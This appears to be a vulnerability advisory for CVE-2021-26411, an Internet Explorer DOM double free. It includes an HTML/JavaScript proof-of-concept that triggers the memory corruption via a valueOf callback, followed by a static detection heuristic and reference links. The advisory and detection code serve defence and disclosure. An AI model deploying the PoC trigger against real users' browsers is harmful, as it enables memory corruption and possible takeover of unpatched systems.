Internet Explorer内存损坏漏洞(CVE-2021-26411).md
1 KB / 2021-05-21 09:14:38
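# Internet Explorer Memory Corruption Vulnerability (CVE-2021-26411)
Internet Explorer contains a double free vulnerability in its handling of DOM objects. An attacker can exploit it by luring a user into opening a malicious link or file. Successful exploitation leads to remote code execution, giving the attacker control of the user's system. Details of the vulnerability are public, and in-the-wild exploitation has been detected.
For vulnerability details, see: https://iamelli0t.github.io/2021/03/12/CVE-2021-26411.html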
PoC:
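```html
<script>
// Element and two attribute nodes to attach to it
var elem = document.createElement('xxx');
var attr1 = document.createAttribute('yyy');
var attr2 = document.createAttribute('zzz');

// Object whose valueOf() callback clears all of elem's attributes
var obj = {};
obj.valueOf = function() {
    elem.clearAttributes();
    return 0x1337;
};

// attr1 holds the object with the callback; attr2 holds a plain number
attr1.nodeValue = obj;
attr2.nodeValue = 123;
elem.setAttributeNode(attr1);
elem.setAttributeNode(attr2);

// Remove attr1, the attribute whose nodeValue carries the valueOf() callback
elem.removeAttributeNode(attr1);
</script>
```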
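For triage of captured pages, the three signals that occur together in the PoC above (a `valueOf` callback that calls `clearAttributes()`, a non-literal assigned to `nodeValue`, and a `removeAttributeNode` call) can be checked statically. This is an added example, not code from the original page or the referenced write-up; the function names are hypothetical and both samples are constructed.

```javascript
// Added example: static triage heuristic for the PoC's shape. Function names
// are hypothetical; both samples below are constructed test input.

// Text between the '{' at index `open` and its matching '}' (naive: braces
// inside strings or comments are not handled).
function braceBody(src, open) {
  let depth = 0;
  for (let i = open; i < src.length; i++) {
    if (src[i] === '{') depth++;
    else if (src[i] === '}' && --depth === 0) return src.slice(open + 1, i);
  }
  return null; // unbalanced input
}

// Bodies of all functions assigned to a `valueOf` property.
function valueOfBodies(src) {
  const re = /\bvalueOf\s*[:=]\s*function\b[^{]*\{/g;
  const bodies = [];
  for (let m; (m = re.exec(src)) !== null; ) {
    const body = braceBody(src, m.index + m[0].length - 1);
    if (body !== null) bodies.push(body);
  }
  return bodies;
}

// Flag a script only when all three signals from the PoC occur together.
function scanForReentrantAttrClear(html) {
  const scripts = html.match(/<script\b[^>]*>[\s\S]*?<\/script>/gi) || [html];
  const findings = [];
  scripts.forEach((s, index) => {
    const signals = {
      valueOfClearsAttributes: valueOfBodies(s).some(b => /\.clearAttributes\s*\(/.test(b)),
      nonLiteralNodeValue: /\.nodeValue\s*=\s*[A-Za-z_$][\w$]*\s*;/.test(s),
      removesAttributeNode: /\.removeAttributeNode\s*\(/.test(s),
    };
    if (Object.values(signals).every(Boolean)) findings.push({ index, signals });
  });
  return findings;
}

const SUSPICIOUS = `<script>
var o = {}; o.valueOf = function() { e.clearAttributes(); return 1; };
a.nodeValue = o; e.setAttributeNode(a); e.removeAttributeNode(a);
</script>`;
const BENIGN = `<script>
var o = {}; o.valueOf = function() { return 1; };
e.clearAttributes(); a.nodeValue = o; e.removeAttributeNode(a);
</script>`;
console.log(scanForReentrantAttrClear(SUSPICIOUS).length, scanForReentrantAttrClear(BENIGN).length);
```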
References:
* https://msrc.microsoft.com/updat ... lity/CVE-2021-26411
* https://nvd.nist.gov/vuln/detail/CVE-2021-26411
* https://iamelli0t.github.io/2021/03/12/CVE-2021-26411.html